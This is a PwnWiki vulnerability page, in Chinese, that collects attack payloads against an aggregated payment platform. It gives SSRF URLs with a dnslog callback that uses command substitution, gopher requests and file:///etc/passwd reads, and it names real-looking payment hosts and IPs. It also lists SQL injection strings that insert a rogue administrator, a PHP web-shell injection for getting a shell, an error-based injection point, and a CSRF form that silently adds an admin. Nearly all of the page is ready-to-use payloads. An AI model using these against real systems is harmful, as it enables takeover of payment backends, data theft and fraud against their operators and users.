Loading
0

全版本聚合支付漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

Warn1.png 这个页面存在争议,因此页面内容存在不确定性。

Vul

http://47.104.233.93/Payment_Index_batchQuery

SSRF

http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?dataorderid=123&configquery_gateway=http://o7xva.l.dnslog.io&configmch_id=123
o7xva.l.dnslog.io/`file`




gopher://192.168.220.139:80/_POST%20/test/ssrf/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.139%250d%250aUser-Agent:%20curl/7.42.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=bbbbb




file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini


SQL注入添加管理员用户

index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no0=exp&out_trade_no1==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+

SQL注入(需要代理账户)

index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
DATA:
id=123&name=_log ; insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27101%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+

insert into pay_admin (`id`,`username`,`password`,`groupid`) values ('101','ok','7aa5e695be95cdd64a88410a64dfe2c1','1');--+

http://vip.qhkjpay.cn/conn.php

SQL注入(payload和上面相同)

index.php?m=user&c=api&a=ajaxGetIndustry

后台Getshell

manage_System_base.html
',@copy($_REQUESTx,$_REQUESTc),//

SQL报错注入(API支付)

Pay_Pay_getSignkey?code=123*&merid=222

CSRF添加管理员

<html lang="en"> 
<body onload="document.forms0.submit();"> 
<form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post"> 
<input type="hidden" name="username" value="ok179"> 
<input type="hidden" name="password" value="test123"> 
<input type="hidden" name="reppassword" value="test123"> 
<input type="hidden" name="groupid" value="1"> 
</body>
</html>

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库